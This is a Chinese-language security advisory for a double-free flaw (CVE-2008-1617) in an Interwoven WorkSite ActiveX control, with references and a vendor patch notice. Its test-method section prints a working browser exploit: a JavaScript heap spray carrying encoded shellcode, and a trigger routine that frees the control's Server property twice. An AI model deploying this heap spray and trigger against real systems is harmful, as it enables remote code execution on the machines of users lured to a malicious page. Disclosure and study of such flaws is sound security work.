发布日期：2008-04-04
更新日期：2008-04-11

受影响系统：

Interwoven WorkSite 8.2

不受影响系统：

Interwoven WorkSite 8.2 SP1 P2

描述：

---

BUGTRAQ  ID: 28628
CVE(CAN) ID: CVE-2008-1617

Worksite是Interwoven发布的文档和邮件管理解决方案。

Worksite的iManFile.cab文件所安装的Web TransferCtrl Class ActiveX控件（CLSID：4BECECDE-E494-4f69-A3DE-DA0B77726307）在处理Server属性时存在双重释放漏洞。如果用户受骗访问了恶意站点的话，就可以触发这个漏洞，导致执行任意指令。

<*来源：J Fitzpatrick
  
  链接：http://secunia.com/advisories/29733/
        http://www.mwrinfosecurity.com/publications/mwri_interwoven-worksite-activex-control-remote-code-execution_2008-03-10.pdf
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<script>
var data = unescape("%ud4b4%u0013")+unescape("%u1111%u1111");
var nop = unescape("%u9090");

var shellcode = "%uc033%u5050%u6a90%u9001%u9050%u5050%u9090"+
                "%u00e8%u0000%u5800%uc083"+
                "%u500d%u91bb%ue7b0%uff77"+
                "%u90d3"+"c:\\owned.txt"+
                "%u0000";
                
shellcode =  unescape(shellcode);

var ar = new Array();
function spray() {
  while(data.length<100000) data+=data;
  for(var x=0; x<512; x++) ar.push(data+"x")
  CollectGarbage();
  while(nop.length<99900) nop+=nop;
  for(var x=0; x<150; x++) ar.push(nop+shellcode)
  CollectGarbage();
}
spray();
</script>
<iframe src="aDRja18y.html"></script>


<body onload="window.setTimeout('start()',2500)">
<div id="hold">
<object id='target' classid="CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307"></object>
</div>
<script>
var s = unescape("%u0810");
var str = s;
var ar = new Array();
while(str.length<25) str+=s;

function start() {
    document.getElementById("hold").innerHTML = "<object id='target' classid='CLSID:4BECECDE-E494-4f69-A3DE-DA0B77726307'></object>";
    var obj=document.getElementById("target");
    var str1=str+s;
    var str2=str+s;
    var str3=str+s;
    CollectGarbage();

    for(var x=0; x<5; x++) {
        str1=str+s;
        obj.Server=str1;
        str1=obj.Server;
        str1=0;
    }

    obj.Server=str2;
    str2=obj.Server;
    str2=0;
    
    obj.Server=str3;
    str3=obj.Server;
    str3=0;
    
    CollectGarbage();
    
    var str4=str+s+str;
    var c=10;
    while(c-- > 0) ar.push(str+s+str);

    var str5 = str+s;var str5 = str+s;var str5 = str+s;
    
    document.getElementById("hold").innerHTML = "";
    obj = 0;
    CollectGarbage();
    var str4=str+s+str;
    var str5 = str+s;var str5 = str+s;var str5 = str+s;
    window.setTimeout("start()",1000)
}
</script>
</body>

建议：

---

厂商补丁：

Interwoven
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://worksitesupport.interwoven.com

浏览次数：2922
严重程度：0（网友投票）